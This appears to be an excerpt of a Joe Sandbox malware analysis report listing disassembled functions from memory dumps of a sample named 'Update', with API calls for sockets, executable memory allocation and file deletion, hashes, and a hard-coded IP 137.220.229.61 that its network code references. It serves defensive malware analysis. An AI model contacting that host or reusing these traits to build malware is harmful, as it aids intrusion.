Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904

__freeptd.LIBCMT ref: 10007165

Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
Part of subcall function 10009A58: TlsSetValue.KERNEL32(0000001F,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE

ExitThread.KERNEL32 ref: 1000716E

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 4224061863-0
Opcode ID: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
Instruction ID: 88b9861ec1dd8ad2b25034eab61c1c94f8d4b81d5381debfb6d8fd2c6c03db1f
Opcode Fuzzy Hash: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
Instruction Fuzzy Hash: 79C02B3050060C7BFB00A776CC0E95F3A8DDF811C1F668010F80CC5159EE38FC008291

Function 6CA94915 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 374fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?), ref: 6CA94924

Strings

', xrefs: 6CA94DC9

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: DeleteFile
String ID: '
API String ID: 4033686569-1997036262
Opcode ID: e6891a2af0921ce2b8b695b68244b525be374e52c3ce6aec3c1c4da91092cda0
Instruction ID: 3feec628a0fcd26a781dab50c530706a68a991104f6dfe63cf6678aa254c27ca
Opcode Fuzzy Hash: e6891a2af0921ce2b8b695b68244b525be374e52c3ce6aec3c1c4da91092cda0
Instruction Fuzzy Hash: 69C11B72D210244BDB2CCA2DCD957EDB6E3AF81314F1A4768E429A7BD4CB319EC48791

Function 6CA96840 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 6CA9685B

Strings

137.220.229.61, xrefs: 6CA964DB, 6CA9651E, 6CA9688A, 6CA968A2, 6CA968E8, 6CA96967, 6CA96975, 6CA96984

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Startup
String ID: 137.220.229.61
API String ID: 724789610-1785040285
Opcode ID: 370bc67378d6b29588125cc77d8c97ecc501be36059a3895407c3dfe2b120f75
Instruction ID: a9048469e1e583cd9bb2410bfb01dddc7d2235469ff92a73c1630753a93eba0b
Opcode Fuzzy Hash: 370bc67378d6b29588125cc77d8c97ecc501be36059a3895407c3dfe2b120f75
Instruction Fuzzy Hash: 32E03071418341AAE2009B11C908B9BBAE8AFDA30CF015A0DB4D855141D7B456988B57

Function 036701CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0367022B

Memory Dump Source

Source File: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, Offset: 03670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3670000_Update.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: ec8fe833f857748ef63b1c724ef1af27e018b277fc5c62c0b1205fbcc5150ce2
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 41A18E71A00606EFCB14CFA9C980AAEF7B5FF08314F5881A9E415DB351E730EA51CBA0

Function 6CA90D50 Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61873d4593c08b8ffda0515f68e9c6f13dbd868172b919d50191516ca31ea2ca
Instruction ID: 8258fbdceac960246e5b44d751f5c759063fbf9b79dd9c871e3fd64243eacb0d
Opcode Fuzzy Hash: 61873d4593c08b8ffda0515f68e9c6f13dbd868172b919d50191516ca31ea2ca
Instruction Fuzzy Hash: 1B91FF71A117448FDB04CF28C981BAABBF6FF89314F148659E81A9B791D730E985CB90

Function 6CAB121C Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CAB15C6: GetConsoleOutputCP.KERNEL32(9AFB9AC3,00000000,00000000,?), ref: 6CAB1629

WriteFile.KERNEL32(?,6CAB07FB,00000000,6CABB0A5,00000000,6CAB07FB,00000000,00000000,?,6CABB0A5,00000000,00000000,6CABAFE2,6CAB07FB,00000000,?), ref: 6CAB13A1
GetLastError.KERNEL32(?,6CABB0A5,00000000,00000000,6CABAFE2,6CAB07FB,00000000,?,6CABA281,00000000,6CAB07FB), ref: 6CAB13AB

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: d9b02396e68770f99aad16410270901f9d325ffa4d9be933cd249a898e3f94c1
Instruction ID: fb9c8e236f3acd8848e9f01352dfc8bc1700f759c94fa0b47de7f180b4c79f92
Opcode Fuzzy Hash: d9b02396e68770f99aad16410270901f9d325ffa4d9be933cd249a898e3f94c1
Instruction Fuzzy Hash: B761A571D14219AFDF05CFA8C984AFEBBBDAF4A308F180155EA10B7645D332D986CB90

Function 6CA8A8B0 Relevance: 3.2, APIs: 2, Instructions: 173COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 6CA8AA36
__fread_nolock.LIBCMT ref: 6CA8AA59

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
Instruction ID: 808b79c33958c645fd203495f7e60aea9e3a5c3dfb91475dd6939c802865f6d0
Opcode Fuzzy Hash: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
Instruction Fuzzy Hash: 955108327092148FC7148E6DC980B1AB3E6AF88718F1A866DF899CB7D0D775DC85CB91

Function 10003350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,00000000), ref: 10003403
_memmove.LIBCMT ref: 10003495

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Time_memmovetime
String ID:
API String ID: 1463837790-0
Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90

Function 6CA81A30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 137sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAA3EF1: GetSystemTimeAsFileTime.KERNEL32(6CA81A64,?,?,?,?,?,6CA81A64,00000000), ref: 6CAA3F06
Part of subcall function 6CAA3EF1: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAA3F25

Sleep.KERNEL32(00000064), ref: 6CA81B6C

Strings

gfff, xrefs: 6CA81A9E

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: gfff
API String ID: 2563648476-1553575800
Opcode ID: 5e10c2fe8ab8b40cc77d7b1d5eed57a5c485481a60edf490af1a6a2817f8b3fd
Instruction ID: c06dfea95e352534c1ae84e560425e5a501fce11cba7b6759f21968b5e203f68
Opcode Fuzzy Hash: 5e10c2fe8ab8b40cc77d7b1d5eed57a5c485481a60edf490af1a6a2817f8b3fd
Instruction Fuzzy Hash: 8851E2B1E012088FDB04CBE9D9087FDBBB4EB05718F088229D125E7B90E77595C9CB92

Function 6CA9CE1B Relevance: 3.1, APIs: 2, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6CA9CE68

Part of subcall function 6CA9D21A: InitializeSListHead.KERNEL32(6CACCA10,6CA9CE72,6CAC9C08,00000010,6CA9D00B,?,00000000,?,00000007,6CAC9C28,00000010,6CA9D01E,?,?,6CA9D0A7,?), ref: 6CA9D21F

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CA9CED2

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: cdba4788a0b5aabed22b2d8ca7e7381935b36f57b938984c2f34df75a2c64064
Instruction ID: db2de046066fa86b93e4c71601934b6dd90230db041d69525fb68e3a40ad7468
Opcode Fuzzy Hash: cdba4788a0b5aabed22b2d8ca7e7381935b36f57b938984c2f34df75a2c64064
Instruction Fuzzy Hash: C0213432B65B11AEDF04BFB89A067D833F1AB4676CF14881AD44267FC0DB3149CD8666

Function 037F2FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 037F3043
recv.WS2_32(?,?,00040000,00000000), ref: 037F3064

Part of subcall function 037FF91B: __getptd_noexit.LIBCMT ref: 037FF91B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: 5b3aa68193ca46dd8e4546b9c3db8d7cc0252bdb898be0c81be9287f556671ba
Instruction ID: 812e1c47ea37f472b0f9a2aa9c490bd50d14f6e293d443ba36592d60585cd9e8
Opcode Fuzzy Hash: 5b3aa68193ca46dd8e4546b9c3db8d7cc0252bdb898be0c81be9287f556671ba
Instruction Fuzzy Hash: 9021827560030C9FEB20EF69DC88B9A77A5FF04350F1805A6E7549F390DB70A984CBA1

Function 10002FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
recv.WS2_32(?,?,00040000,00000000), ref: 10003044

Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
Opcode Fuzzy Hash: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1

Function 6CAB19F5 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6CAB1387,?,6CABA281,6CAB07FB,00000000,6CAB07FB,00000000), ref: 6CAB1A91
GetLastError.KERNEL32(?,6CAB1387,?,6CABA281,6CAB07FB,00000000,6CAB07FB,00000000,00000000,?,6CABB0A5,00000000,00000000,6CABAFE2,6CAB07FB,00000000), ref: 6CAB1AB7

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 07d90eab3bd74832f392434fb2d56337035fdbe494442a1a3bffa79e21357ee9
Instruction ID: 3d3963da6b9352a7f1c1e9ffe410c787d1dcf2acd9a0c2f9ca2a89947540c252
Opcode Fuzzy Hash: 07d90eab3bd74832f392434fb2d56337035fdbe494442a1a3bffa79e21357ee9
Instruction Fuzzy Hash: 4D219431A0125D9FCB19CF1DC8809E9B7FAEB49305F1441AEEA05E7611D730EE86CB61

Function 6CA91070 Relevance: 3.1, APIs: 2, Instructions: 79COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6CA91124
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA9115F

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: AttributesFileIos_base_dtorstd::ios_base::_
String ID:
API String ID: 2738015347-0
Opcode ID: 145cb6ff982d24baa2a23ccb5f5d6acda2fbd03056a2082676a6a778792533e2
Instruction ID: 3b8c41e2385760b1ed7bb70e458920d97036c7dee6aba4cb2d78bf6e36e61a7d
Opcode Fuzzy Hash: 145cb6ff982d24baa2a23ccb5f5d6acda2fbd03056a2082676a6a778792533e2
Instruction Fuzzy Hash: 25316D75611700DFE724CF28C945B96BBE9FB45724F108A1CE56A4B790C731F984CB81

Function 6CA9CF22 Relevance: 3.1, APIs: 2, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6CA9CF69
___scrt_uninitialize_crt.LIBCMT ref: 6CA9CF83

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 1f5d6c40b50f37275f4db4ffa59128d1c32efacd445e12a6a10fcc04f325acc3
Instruction ID: 41e4e27d60b886f68b10e1e98c89bef1ffdc90106ff77f521efb6f2399978c4e
Opcode Fuzzy Hash: 1f5d6c40b50f37275f4db4ffa59128d1c32efacd445e12a6a10fcc04f325acc3
Instruction Fuzzy Hash: 1521D473E38755ABCB04AFA896073DD77E0EB0575DF10801AD01296E80DB7486C9CB91

Function 037F3260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00040000,00000000), ref: 037F3291
send.WS2_32(?,?,?,00000000), ref: 037F32CE

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: d14f33923bb404fb42ca06c4e0d0b1904254ac10be653c0710476940d431f022
Instruction ID: e204f6628a3c7aba02e2eac3181478a7444e3aa05f27af01b6fcf4f1c3729453
Opcode Fuzzy Hash: d14f33923bb404fb42ca06c4e0d0b1904254ac10be653c0710476940d431f022
Instruction Fuzzy Hash: 8711E17AB01304AFE720CA6EDC88B5ABB9DFB81264F144166EB1CD7380D270D9818650

Function 6CAAFE7C Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,?,00008000,6CA8BBBA,00008000,6CAB07FB,?,?,?,6CAAFD04,6CAB07FB,?,00000000,6CA8BBBA,?), ref: 6CAAFEB8
GetLastError.KERNEL32(00000000,?,?,?,6CAAFD04,6CAB07FB,?,00000000,6CA8BBBA,?,00000000,00008000,6CAB07FB,?,?,6CAB9C04), ref: 6CAAFEC5

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 2b0c82125e358540d497c9f967eb5ca43dcd9b58fe3be1224fb57eb0cb6c8e5b
Instruction ID: f3237c8c4519a7acf3f0ef5431c48ba769ba87fd0b837d3c8ee722a76b6700fb
Opcode Fuzzy Hash: 2b0c82125e358540d497c9f967eb5ca43dcd9b58fe3be1224fb57eb0cb6c8e5b
Instruction Fuzzy Hash: 41012632614656AFCF1D8F99CC0988E3B79DF85324B280249F8119B691E671D992CB90

Function 037F30E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 037F310A
timeGetTime.WINMM ref: 037F3124

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: cee107d3c32626b2edbf85d55d535b3f3beba51b964eb1f9e9a02c29628f604c
Instruction ID: 518d66b8342ff05218431d0a5c9aa654122766544c597eada99e45bec308d2a6
Opcode Fuzzy Hash: cee107d3c32626b2edbf85d55d535b3f3beba51b964eb1f9e9a02c29628f604c
Instruction Fuzzy Hash: 9601F735204A05AFE311EF68C8C8B6DF7B9FB9A301F184264D2044B290D731A9C6C7D1

Function 100030C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 100030EA
timeGetTime.WINMM ref: 10003104

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
Opcode Fuzzy Hash: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1

Function 037FCD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,037FE04E,00000000,037F9800,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037FCD1B
_free.LIBCMT ref: 037FCD56

Part of subcall function 037F1280: __CxxThrowException@8.LIBCMT ref: 037F1290
Part of subcall function 037F1280: DeleteCriticalSection.KERNEL32(00000000,037FD3E6,03816624,?,?,037FD3E6,?,?,?,?,03815A40,00000000), ref: 037F12A1

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
String ID:
API String ID: 1116298128-0
